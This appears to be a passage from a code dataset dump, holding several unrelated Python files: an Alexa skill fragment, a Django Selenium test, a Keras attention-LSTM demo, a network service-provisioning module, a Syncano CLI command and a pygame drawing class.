SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(BlogIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nskill = sb.create()\n", "sub_path": "alexa/skill.py", "file_name": "skill.py", "file_ext": "py", "file_size_in_byte": 4901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 13, "usage_type": "attribute"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 15, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_request_type", "line_number": 20, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 20, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 34, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 38, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 59, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 63, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 63, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 77, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 81, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 81, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_intent_name", "line_number": 82, "usage_type": "call"}, {"api_name": 
"ask_sdk_core.utils", "line_number": 82, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractRequestHandler", "line_number": 95, "usage_type": "name"}, {"api_name": "ask_sdk_core.utils.is_request_type", "line_number": 99, "usage_type": "call"}, {"api_name": "ask_sdk_core.utils", "line_number": 99, "usage_type": "name"}, {"api_name": "ask_sdk_core.dispatch_components.AbstractExceptionHandler", "line_number": 109, "usage_type": "name"}, {"api_name": "ask_sdk_core.skill_builder.SkillBuilder", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "520171752", "text": "\nfrom django.contrib.staticfiles.testing import StaticLiveServerCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport unittest\nimport sys\n\n\nclass NewVisitorTest(StaticLiveServerCase):\n\n\t@classmethod\n\tdef setUpClass(cls):\n\t\tfor arg in sys.argv:\n\t\t\tif 'liveserver' in arg:\n\t\t\t\tcls.server_url = 'http://' + arg.split('=')[1]\n\t\t\t\treturn\n\t\tsuper().setUpClass()\n\t\tcls.server_url = cls.live_server_url\n\t\t\n\t@classmethod\n\tdef tearDownClass(cls):\n\t\tif cls.server_url == cls.live_server_url:\n\t\t\tsuper().tearDownClass()\n\n\tdef setUp(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\t\t\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\t\t\n\tdef check_for_row_in_list_table(self, row_text):\n\t\ttable = self.browser.find_element_by_id('id_list_table')\n\t\trows = table.find_elements_by_tag_name('tr')\n\t\tself.assertIn(row_text, [row.text for row in rows])\n\t\t\n\tdef test_can_start_a_list_and_finish_it_later(self):\n\t\t# Anita heard about a new online to-do list \n\t\t# and decided to check out its home page\n\t\tself.browser.get(self.server_url)\n\t\tself.assertIn('To-Do', self.browser.title)\n\t\theader_text = self.browser.find_element_by_tag_name('h1').text\n\t\tself.assertIn('To-Do', header_text)\n\t\t\n\t\t# She is invited to enter an item right away\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertEqual(\n\t\t\tinputbox.get_attribute('placeholder'),\n\t\t\t'Enter a to-do item'\n\t\t)\n\t\t\n\t\t# She enters \"Do shopping\" into a textbox\n\t\tinputbox.send_keys('Do shopping')\n\t\t\n\t\t# When she hits enter the page updates to show a table with\n\t\t# \"1: Do shopping\" as an item\n\t\tinputbox.send_keys(Keys.ENTER)\n\t\tanita_list_url = self.browser.current_url\n\t\tself.assertRegex(anita_list_url, '/lists/.+/$')\n\t\tself.check_for_row_in_list_table('1: Do shopping')\n\t\t\t\t\n\t\t# There is still a textbox inviting her to enter another item\n\t\t# she enters \"Have fun\"\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tinputbox.send_keys('Have fun')\n\t\tinputbox.send_keys(Keys.ENTER)\n\t\t\n\t\t# The page updates again to show both items in the list\n\t\tself.check_for_row_in_list_table('1: Do shopping')\n\t\tself.check_for_row_in_list_table('2: Have fun')\n\t\t\n\t\t# A new user, Darwin, comes along \n\t\t\n\t\t## We use a new browser session to make sure that no information\n\t\t## of Anita's is coming through from cookies etc #\n\t\tself.browser.quit()\n\t\tself.browser = webdriver.Firefox()\n\t\t\n\t\t# Darwin visits the home page. There is no sign of Anita's items\n\t\tself.browser.get(self.server_url)\n\t\tpage_text = self.browser.find_element_by_tag_name('body').text\n\t\tself.assertNotIn('Have fun', page_text)\n\t\tself.assertNotIn('Do shopping', page_text)\n\t\t\n\t\t# Darwin starts a new list by entering an item. 
He's just a baby so...\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tinputbox.send_keys('Cause trouble')\n\t\tinputbox.send_keys(Keys.ENTER)\n\n\t\t# Darwin gets his own url\n\t\tdarwin_list_url = self.browser.current_url\n\t\tself.assertRegex(darwin_list_url, '/lists/.+/$')\n\t\tself.assertNotEqual(darwin_list_url, anita_list_url)\n\t\t\n\t\t# There is no trace of Anita's list\n\t\tpage_text = self.browser.find_element_by_tag_name('body').text\n\t\tself.assertNotIn('Have fun', page_text)\n\t\tself.assertIn('Cause trouble', page_text)\n\t\t\n\t\t# Both are now happy campers\n\t\t\n\t\t\n\tdef test_layout_and_styling(self):\n\t\t# Anita goes to the site\n\t\tself.browser.get(self.server_url)\n\t\tself.browser.set_window_size(1024, 768)\n\t\t\n\t\t# She notices the input box is centred\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertAlmostEqual(\n\t\t\tinputbox.location['x'] + inputbox.size['width'] / 2,\n\t\t\t512, delta=7)\n\t\t\t\n\t\t# She starts a new list and sees the input centred there too\n\t\tinputbox.send_keys('testing\\n')\n\t\tinputbox = self.browser.find_element_by_id('id_new_item')\n\t\tself.assertAlmostEqual(\n\t\t\tinputbox.location['x'] + inputbox.size['width'] / 2,\n\t\t\t512, delta=7)\n\t\t", "sub_path": "functional_tests/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3875, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.staticfiles.testing.StaticLiveServerCase", "line_number": 9, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 57, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 57, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 66, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 66, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 77, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 77, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 88, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 88, "usage_type": "name"}]} +{"seq_id": "342794941", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, concatenate, multiply, Dense, Permute, Reshape, LSTM, Activation\nfrom keras import optimizers\nfrom keras.utils.np_utils import to_categorical\nimport keras.backend as K\n\n\ndata = datasets.load_digits()\n\nX_data = data.images\ny_data = data.target\n\ny_data = to_categorical(y_data)\n\nX_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size = 0.2, random_state = 777)\n\ndef attention_3d_block(inputs):\n # inputs.shape = (batch_size, time_steps, input_dim)\n input_dim = int(inputs.shape[2])\n a = Permute((2, 1))(inputs)\n a = Reshape((input_dim, TIME_STEPS))(a) # this line is not useful. 
It's just to know which dimension is what.\n a = Dense(TIME_STEPS, activation='softmax')(a)\n if SINGLE_ATTENTION_VECTOR:\n a = Lambda(lambda x: K.mean(x, axis=1), name='dim_reduction')(a)\n a = RepeatVector(input_dim)(a)\n a_probs = Permute((2, 1), name='attention_vec')(a)\n output_attention_mul = multiply([inputs, a_probs], name='attention_mul')\n return output_attention_mul\n\ndef attention_lstm():\n inputs = Input(shape=(TIME_STEPS, INPUT_DIM,))\n attention_mul = attention_3d_block(inputs)\n lstm_units = 32\n attention_mul = LSTM(lstm_units, return_sequences=False)(attention_mul)\n output = Dense(10, activation='softmax')(attention_mul)\n model = Model(inputs=[inputs], outputs=output)\n \n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n \n return model\n\nmodel = attention_lstm()\nmodel.fit([X_train], y_train, epochs = 100, batch_size = 64, validation_split = 0.3, verbose = 0)\n\nattention_vector = get_activations(model, [X_train[0]], print_shape_only=True, layer_name = 'attention_vec')[0].reshape(8,8)\n\nplt.imshow(attention_vector)\nplt.show()", "sub_path": "5. ETC/3-Attention-mechanism/2-2-attention-with-rnn.py", "file_name": "2-2-attention-with-rnn.py", "file_ext": "py", "file_size_in_byte": 1960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sklearn.datasets.load_digits", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 14, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.layers.Permute", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Reshape", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 30, "usage_type": "name"}, {"api_name": "keras.layers.Permute", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers.multiply", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "44520716", "text": "# Python imports\nimport logging\n\n# ONSA imports\nfrom charles.utils.utils import *\nfrom charles.utils.inventory_utils import *\nfrom charles.utils.ipam_utils import *\nfrom charles.constants import *\nfrom charles.models import *\n\n\ndef deleted_automated_request(service):\n logging.debug(\"deleted_automated_request\")\n client = get_client(service['client_id'])\n service_data = {}\n\n try:\n parameters = an_parameters(client, service)\n config = {\n \"client\": client['name'],\n \"service_type\": service['service_type'],\n \"service_id\": service['service_id'],\n \"op_type\": \"DELETE\"}\n\n 
config['parameters'] = {\n \"service_vlan\": service['vlan_id'],\n \"an_client_port\": parameters['an_client_port'],\n \"an_uplink_ports\": parameters['an_uplink_ports'],\n \"access_port_services\":parameters['access_port_services']\n }\n config['devices'] = [{\"vendor\": parameters['vendor'],\n \"model\": parameters['model'], \"mgmt_ip\": parameters['mgmt_ip']}]\n\n service_state = DELETEINPROGRESS_SERVICE_STATE\n\n logging.debug(f'releasing service resources for service {service}')\n if service['public_network']:\n destroy_subnet(client['name'], service['service_id'])\n if service['wan_network']:\n destroy_subnet(client['name'], service['service_id'])\n release_access_port(service['access_port_id'])\n release_vlan(service['access_node_id'], service['vlan_id'])\n logging.debug(\"deleting service\")\n\n #Send message(job) to Queue so workers can take it\n configure_service(config) \n except BaseException as e:\n logging.error(e)\n service_state = DELETEERROR_SERVICE_STATE\n\n service_data['service_state'] = service_state\n update_jeangrey_service(service['service_id'], service_data)\n service = update_charles_service(service, service_state)\n return service\n\n\ndef an_activated_automated_request(service):\n logging.debug(\"an_activated_automated_request\")\n client = get_client(service['client_id'])\n service_data = {}\n\n try:\n parameters = an_parameters(client, service)\n config = {\n \"client\": client['name'],\n \"service_type\": service['service_type'],\n \"service_id\": service['service_id'],\n \"op_type\": \"CREATE\"}\n\n backbone_parameters = bb_parameters(client, service)\n\n config['parameters'] = {\n \"service_vlan\": service['vlan_id'],\n \"an_client_port\": parameters['an_client_port'],\n \"an_uplink_ports\": parameters['an_uplink_ports'],\n \"access_port_services\":parameters['access_port_services']\n }\n config['devices'] = [{\"vendor\": parameters['vendor'],\n \"model\": parameters['model'], \"mgmt_ip\": parameters['mgmt_ip']}]\n\n service_state = \"an_activation_in_progress\"\n logging.debug(\"configuring service\")\n \n #Send message(job) to Queue so workers can take it\n configure_service(config) \n except BaseException:\n service_state = \"ERROR\"\n destroy_subnet(client['name'], service['service_id'])\n\n service_data['service_state'] = service_state\n service_data['public_network'] = backbone_parameters['public_network']\n service_data['wan_network'] = backbone_parameters['wan_network']\n update_jeangrey_service(service['service_id'], service_data)\n service = update_charles_service(service, service_state)\n return service\n\ndef an_parameters(client, service):\n try:\n access_port = get_access_port(service['access_port_id'])\n access_node = get_access_node(service['access_node_id'])\n an_device_model = get_device_model(access_node['device_model_id'])\n access_port_services = get_access_port_services(service['access_port_id'])\n\n services = \"\"\n for my_service in access_port_services:\n if my_service['id'] is not service['service_id']:\n services+= str(my_service['id']) + \"-\"\n services += str(service['service_id'])\n\n parameters = { 'provider_vlan': access_node['provider_vlan'],\n 'an_client_port': access_port['port'],\n 'an_uplink_ports': access_node['uplink_ports'],\n 'mgmt_ip': access_node['mgmt_ip'],\n 'model': an_device_model['model'],\n 'vendor': an_device_model['brand'],\n 'access_port_services': services }\n\n logging.debug(f'parameters: {parameters}')\n\n return parameters\n except BaseException:\n logging.error(\"Unable to fetch parameters\")\n 
raise InvalidParametersException(\"Unable to fetch parameters\")\n\n # service_data = {}\n\n\n\ndef bb_parameters(client, service):\n try:\n location = get_location(service['location_id'])\n logging.debug(f'location: {location}')\n\n router_node = get_router_node(service['router_node_id'])\n logging.debug(f'router_node: {router_node}')\n\n rn_device_model = get_device_model(router_node['device_model_id'])\n \n logging.debug(f'looking network with prefix {service[\"prefix\"]} for service ID {service[\"service_id\"]} client {client[\"name\"]}')\n public_network = assign_network(client['name'], service['service_id'],IPAM_PUBLIC_NETWORK,service['prefix'])\n logging.debug(f'network: {public_network}')\n wan_network = assign_network(client['name'], service['service_id'],IPAM_MGMT_WAN,IPAM_MGMT_WANPREFIX)\n logging.debug(f'network: {wan_network}')\n\n parameters = {\n 'pop_size': location['pop_size'],\n 'public_network' : public_network,\n 'wan_network' : wan_network\n }\n\n parameters['router_node'] = { 'vendor': rn_device_model['brand'],\n 'model': rn_device_model['model'],\n 'mgmt_ip': router_node['mgmt_ip']\n }\n\n logging.debug(f'parameters: {parameters}')\n return parameters\n except BaseException:\n logging.error(\"Unable to fetch parameters\")\n raise InvalidParametersException(\"Unable to fetch parameters\")\n\n\n # \"\"\"\n # Fetch logical units\n # \"\"\"\n # if service['logical_unit_id'] is None:\n # free_logical_units = get_free_logical_units(router_node['id'])\n # if free_logical_units is None:\n # logging.warning('No available logical units')\n # parameters['status'] = ERR_NO_LOGICALUNITS\n # return parameters\n # else:\n # logical_unit_id = free_logical_units[0]['id']\n # client_network = get_client_network(client['name'], service['id'], service['prefix'])\n # if client_network:\n # add_logical_unit_to_router_node(router_node['id'], logical_unit_id, service['id'])\n # else:\n # logging.warning('No public networks available')\n # parameters['status'] = ERR_NO_PUBLICNETWORKS\n # return parameters\n\n # wan_network = get_wan_mpls_network(location['name'], client['name'], service['id'])\n\n # else:\n # logical_unit_id = service['logical_unit_id']\n # client_network = service['public_network']\n # wan_network = service['wan_network']\n\n\n\ndef bb_data_ack_automated_request(service):\n # if DEBUG: print(\"bb_data_ack_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = bb_parameters(client, service)\n\n # if DEBUG: print(parameters)\n\n # #Handle parameters ERROR\n # if parameters is not None:\n # service_data = { 'logical_unit_id': parameters['logical_unit_id'],\n # 'wan_network': parameters['wan_network']\n # }\n # service_data['public_network'] = parameters['client_network']\n # service_state = \"bb_data_ack\"\n\n # else:\n # service_data = {}\n # service_state = \"ERROR\"\n\n # service_data['service_state']=service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n # service.update(service_data)\n # my_service = service\n # return my_service\n pass\n\n\ndef bb_activated_automated_request(service):\n # if DEBUG: print(\"bb_activated_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = bb_parameters(client, service)\n\n # config = {\n # \"client\" : client['name'],\n # \"service_type\" : service['service_type'],\n # \"service_id\" : service['service_id'],\n # \"op_type\" : \"CREATE\" }\n\n # config['parameters'] = {\n # \"pop_size\" : 
parameters['pop_size'], \n # \"an_uplink_interface\" : parameters['an_uplink_interface'],\n # \"an_uplink_ports\" : parameters['an_uplink_ports'],\n # \"logical_unit\" : parameters['logical_unit_id'], \n # \"provider_vlan\" : parameters['provider_vlan'], \n # \"service_vlan\" : service['vlan_id'], \n # \"an_client_port\" : parameters['an_client_port'],\n # \"wan_cidr\": service['wan_network'],\n # \"client_cidr\": service['public_network']\n # }\n\n # config['devices'] = [{\"vendor\": parameters['router_node']['vendor'],\"model\": parameters['router_node']['model'],\"mgmt_ip\": parameters['router_node']['mgmt_ip']}]\n\n # configure_service(config)\n # # service_data = {}\n # # service_data['service_state'] = \"bb_activation_in_progress\"\n # service_state = \"bb_activation_in_progress\"\n # service_data = {'service_state' : service_state}\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n\n # return service\n pass\n\ndef an_data_ack_automated_request(service):\n # if DEBUG: print(\"an_data_ack_automated_request\")\n # # service_data = {}\n # # service_data['service_state'] = \"an_data_ack\"\n # service_state = \"an_data_ack\"\n # service_data = {'service_state' : service_state}\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state)\n # return service\n pass\n\n\ndef cpe_data_ack_automated_request(service):\n # if DEBUG: print(\"cpe_data_ack_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = cpe_parameters(client, service)\n # customer_location = get_customer_location(service['client_id'], service['customer_location_id'])\n\n # if parameters['client_port_id']:\n # service_data = { \"client_port_id\": parameters['client_port_id']}\n\n # service_state = \"cpe_data_ack\"\n\n # service_data['service_state']=service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state) \n # service.update(service_data)\n # return service\n pass\n\ndef service_activated_automated_request(service):\n # if DEBUG: print(\"service_activated_automated_request\")\n # client = get_client(service['client_id'])\n # parameters = cpe_parameters(client, service)\n # config = {\n # \"client\" : client['name'],\n # \"service_type\" : service['service_type'],\n # \"service_id\" : service['service_id'],\n # \"op_type\" : \"CREATE\" }\n\n # service_data = {}\n\n # if parameters is not None:\n # config['parameters'] = { \n # \"service_vlan\" : service['vlan_id'], \n # \"bandwidth\" : service['bandwidth'],\n # \"on_client_port\" : parameters['client_node']['interface_name'],\n # \"on_uplink_port\" : parameters['client_node']['uplink_port'],\n # \"wan_cidr\": service['wan_network'],\n # \"client_cidr\": service['public_network']\n # }\n\n # config['devices'] = [{\"vendor\": parameters['client_node']['vendor'], \"model\": parameters['client_node']['model'], \"mgmt_ip\": parameters['client_node']['mgmt_ip']}]\n\n\n # service_state = \"cpe_activation_in_progress\"\n # configure_service(config)\n # else:\n # service_state = \"ERROR\"\n\n # service_data['service_state'] = service_state\n # update_jeangrey_service(service['service_id'], service_data)\n # service = update_charles_service(service, service_state) \n # return service\n pass\n\n\ndef cpe_parameters(client, service):\n pass \n # location = get_location(service['location_id'])\n # client_node = 
get_client_node(service['client_node_sn'])\n # parameters = {}\n \n # if service['client_port_id'] is None:\n # customer_location = get_customer_location(client['id'],service['customer_location_id'])\n # client_port_id = fetch_cpe_port_id(service['client_node_sn'], client['name'], customer_location) \n # client_port = get_client_port(service['client_node_sn'], client_port_id)\n # parameters['client_port_id'] = client_port_id\n\n # else:\n # client_port = get_client_port(service['client_node_sn'], service['client_port_id'])\n\n # parameters['client_node'] = { 'vendor': client_node['vendor'],\n # 'model': client_node['model'],\n # 'mgmt_ip': client_node['mgmt_ip'],\n # 'interface_name': client_port['interface_name'],\n # 'wan_network': service['wan_network'],\n # 'uplink_port' : client_node['uplink_port']\n # }\n\n # return parameters", "sub_path": "charles/charles/services/cpe_irs_service.py", "file_name": "cpe_irs_service.py", "file_ext": "py", "file_size_in_byte": 13168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.debug", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 118, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 132, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 135, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 139, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 156, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "250340943", "text": "# -*- coding: utf-8 -*-\nimport json\nimport sys\nfrom ConfigParser import NoOptionError\n\nimport click\nfrom syncano.exceptions import SyncanoDoesNotExist\nfrom syncano_cli.base.connection import create_connection, get_instance_name\nfrom syncano_cli.config import ACCOUNT_CONFIG_PATH\n\nfrom .utils import print_response\n\n\n@click.group()\ndef top_execute():\n pass\n\n\n@top_execute.command()\n@click.option('--config', help=u'Account configuration file.')\n@click.option('--instance-name', help=u'Instance name.')\n@click.argument('script_endpoint_name')\n@click.option('--payload', help=u'Script payload in JSON format.')\ndef execute(config, instance_name, script_endpoint_name, payload):\n \"\"\"\n Execute script endpoint in given instance\n \"\"\"\n config = config or ACCOUNT_CONFIG_PATH\n instance_name = get_instance_name(config, instance_name)\n try:\n connection = create_connection(config)\n instance = connection.Instance.please.get(instance_name)\n se = instance.script_endpoints.get(instance_name, script_endpoint_name)\n data = json.loads((payload or '').strip() or '{}')\n response = se.run(**data)\n print_response(response)\n except NoOptionError:\n click.echo(u'ERROR: Do a login first: syncano login.')\n sys.exit(1)\n except SyncanoDoesNotExist as e:\n click.echo(u'ERROR: {}'.format(e))\n sys.exit(1)\n 
except ValueError as e:\n click.echo(u'ERROR: Invalid payload format: {error}'.format(error=e))\n sys.exit(1)\n", "sub_path": "syncano_cli/execute/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "click.group", "line_number": 14, "usage_type": "call"}, {"api_name": "syncano_cli.config.ACCOUNT_CONFIG_PATH", "line_number": 28, "usage_type": "name"}, {"api_name": "syncano_cli.base.connection.get_instance_name", "line_number": 29, "usage_type": "call"}, {"api_name": "syncano_cli.base.connection.create_connection", "line_number": 31, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.print_response", "line_number": 36, "usage_type": "call"}, {"api_name": "ConfigParser.NoOptionError", "line_number": 37, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 38, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}, {"api_name": "syncano.exceptions.SyncanoDoesNotExist", "line_number": 40, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 42, "usage_type": "call"}, {"api_name": "click.echo", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 21, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 22, "usage_type": "call"}, {"api_name": "click.option", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "589496372", "text": "import pygame\nfrom pygame.locals import *\n\n#Pygame draw class. Draws the different sections to the pygame screen. DrawStringData draws readable data.\n#DrawGraph draws the graph. 
DrawPosition draws the position.\nclass DrawPlayer():\n\tdef __init__(self, surface, start_xPos, start_yPos):\n\t\tself.surface = surface\n\t\tself.start_xPos = start_xPos\n\t\tself.start_yPos = start_yPos\n\t\t\n\t\tself.number = 0\n\t\tself.hearth = 0\n\t\tself.breath = 0\n\t\tself.position = 0\n\t\tself.hearthGraph = []\n\t\tself.breathGraph = []\n\t\tself.positionCircle = 0\n\t\t\n\tdef drawBox(self):\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos), (self.start_xPos+500, self.start_yPos))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos+100), (self.start_xPos+500, self.start_yPos+100))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos, self.start_yPos), (self.start_xPos+100, self.start_yPos))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos+500, self.start_yPos), (self.start_xPos+500, self.start_yPos+100))\n\t\tpygame.draw.line(self.surface, pygame.Color(155,155,155), (self.start_xPos+250, self.start_yPos), (self.start_xPos+250, self.start_yPos+100))\n\t\t\n\tdef drawStringData(self, name, hearth, breath, xPos, yPos):\n\t\tpygame.font.init()\n\t\tfont = pygame.font.SysFont('Calibri', 15)\n\t\tself.number = font.render('#'+str(name), False, (0, 0, 0))\n\t\tself.surface.blit(self.number, (0, self.start_yPos))\n\t\t\n\t\tself.position = font.render('xPos:'+str(xPos)+\", yPos:\"+str(yPos), False, (0, 0, 0))\n\t\tself.surface.blit(self.position, (0, self.start_yPos+25))\n\t\t\n\t\tself.hearth = font.render('Current Heart:'+str(hearth), False, (255, 0, 0))\n\t\tself.surface.blit(self.hearth, (0, self.start_yPos+50))\n\t\t\n\t\tself.breath = font.render('Current Breath:'+str(breath), False, (0, 0, 255))\n\t\tself.surface.blit(self.breath, (0, self.start_yPos+75))\n\t\t\n\tdef drawGraph(self, hearthList, breathList):\n\t\tpygame.draw.line(self.surface, pygame.Color(0, 0,0), (self.start_xPos+250+250, self.start_yPos), (self.start_xPos+250+250, self.start_yPos+100))\n\t\t\n\t\ti = 0\n\t\tprev_value = 0\n\t\tfor value in hearthList:\n\t\t\tif prev_value:\n\t\t\t\tpygame.draw.line(self.surface, pygame.Color(255, 0,0), (self.start_xPos+250+250-i, self.start_yPos+100-prev_value/2), (self.start_xPos+250+250-i-1, self.start_yPos+100-value/2))\n\t\t\tprev_value = value\n\t\t\ti = i + 1\n\t\t\n\t\ti = 0\n\t\tprev_value = 0\n\t\tfor value in breathList:\n\t\t\tif prev_value:\n\t\t\t\tpygame.draw.line(self.surface, pygame.Color(0, 0,255), (self.start_xPos+250+250-i, self.start_yPos+100-prev_value/2), (self.start_xPos+250+250-i-1, self.start_yPos+100-value/2))\n\t\t\tprev_value = value\n\t\t\ti = i + 1\n\t\t\n\tdef drawPosition(self, xPos, yPos, name):\n\t\t#Limits the positions inside bounds.\n\t\txPos = xPos + 1 #These two maps (0,0) to \"1,1\" on screen in a 5x5m square\n\t\tyPos = yPos + 1\n\t\tif xPos <= 0:\n\t\t\txPos = 0\n\t\telif xPos >= 5:\n\t\t\txPos = 5\n\t\tif yPos <= 0:\n\t\t\tyPos = 0\n\t\telif yPos >= 5:\n\t\t\tyPos = 5\n\t\t#Maps real life meters into pixels on the screen.\n\t\txPos = int((xPos)*250/5) + 500 #Change these if neccessary.\n\t\tyPos = int((yPos)*250/5)\n\t\tcenter = [xPos, yPos]\n\t\tself.positionCircle = pygame.draw.circle(self.surface, (255, 255, 0), center, 10)\n\t\t\n\t\tpygame.font.init()\n\t\tfont = pygame.font.SysFont('Calibri', 15)\n\t\tself.number = font.render(str(name), False, (0, 0, 0))\n\t\tself.surface.blit(self.number, (xPos-4, yPos-7))\n\t\t", "sub_path": "src/ui/drawplayer.py", "file_name": 
